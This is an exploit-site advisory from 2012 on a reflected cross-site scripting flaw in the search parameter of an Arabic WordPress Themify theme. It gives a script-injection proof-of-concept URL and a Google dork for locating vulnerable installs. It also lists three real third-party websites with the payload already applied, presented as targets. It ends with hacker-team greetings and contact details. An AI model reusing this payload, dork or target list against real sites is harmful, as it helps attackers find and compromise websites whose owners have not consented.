facebook facebook twitter rss

XSS Vulnerability In Wordpress Themify Theme ( Arabic )

Author: HaCker-1420 , Published: 04-05-2012
+-----------------------------------------------------------+
# Exploit Title : Title: XSS Vulnerability In Wordpress Themify Theme ( Arabic )
# Google dork : allintext : "dork : تصميم : Themify • تعريب : ووردبريس"
# Software Link : http://wp-gallary.com/wp-content/files/itheme2.zip
# Date : 04/05/2012
# Author : HaCker-1420
# Facebook Page : https://www.facebook.com/crackerdz
# Email : belaoudja.mohamed@gmail.com OR k-c0@hotmail.com
# Tested on : Windows Seven Edition Integral / French
+-----------------------------------------------------------+
[~] Exploit/p0c :

http://localhost/?s=<script>alert("xxs")<%2Fscript>

[~] Example Sites:
http://moviemaker.ma/?s=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
http://asyutnews.com/?s=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
http://themes.web-ar.com/?s=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
(And Moore In Google)
+-----------------------------------------------------------+

[»] #-Exploit 4 Arab Team -#
[»] Damane2011, N4ss1m, HaCker-1420, L3b-r1'z
+--------------------------------------------------+
[»] Greetz to : Abdou Hanchor -- Klozo Hicham -- Gatsro -- Triplex Lilou -- Bilal Fodil -- Meguenni Achour -- Mad HackerZ Team
---------------------------------------------------+
exploit4arab © 2012 All rights reserved

Like us on Facebook :